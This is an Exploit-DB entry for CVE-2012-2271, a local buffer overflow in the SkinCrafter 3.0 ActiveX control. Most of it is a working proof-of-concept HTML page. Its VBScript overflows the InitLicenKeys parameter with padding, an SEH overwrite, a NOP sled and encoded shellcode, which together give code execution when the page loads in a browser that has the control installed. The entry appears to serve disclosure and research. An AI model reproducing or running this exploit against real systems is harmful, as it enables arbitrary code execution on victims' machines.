SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow

EDB-ID:

18892

CVE:

2012-2271

EDB Verified:

Author:

saurabh sharma

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2012-05-17

Vulnerable App: 
# Software  : SkinCrafter from NMSoft Technologies
# Version   : SkinCrafter version 3.0
# Title     : Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
# Link      : http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
# Date      : May 17, 2012
# Tested on : XP SP2

# The vulnerability lies in the COM component used by the product SkinCrafter
# from DMSoft Technologies(http://www.dmsofttech.com/projects.html). This COM
# component, SkinCrafter3_vs2005.dll, implememnts a function InitLicenKeys,
# whose parameter is not checked for the bounds, hence leading to the
# overflow condition

====
POC:
====

<html>
Exploit !!!!!!!!!!!!!!!!!!!!!!!!!
<object classid='clsid:B9D38E99-5F6E-4C51-8CFD-507804387AE9' id='target' ></object>
<script language='vbscript'>
'Exploit title: Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
'Date: May 17, 2012
'author: Saurabh Sharma(HCL Technologies) sharma_saurabh@hcl.com
'Software Link: http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip 
'version: SkinCrafter version 3.0
'Tested on : XP SP2
'CVE-2012-2271

targetFile = "C:\Program Files\SkinCrafter3\SkinCrafterDemo\SkinCrafterActiveX\SkinCrafter3_vs2005.dll"
prototype  = "Sub InitLicenKeys ( ByVal reg_name As String ,  ByVal company As String ,  ByVal email As String ,  ByVal licenkey As String )"
memberName = "InitLicenKeys"
progid     = "SKINCRAFTERLib.SCSkin3"
argCount   = 4

shellcode= unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
unescape("%50%68")

arg1=String(1084, "A")
nSeh=unescape("%eb%06%90%90")
seh=unescape("%bb%44%06%10")

nops=String(40,unescape("%90"))
arg1=arg1+nSeh+seh+nops+shellcode
arg1=arg1+String(10000, "D")
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"

target.InitLicenKeys arg1 ,arg2 ,arg3 ,arg4 

</script>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services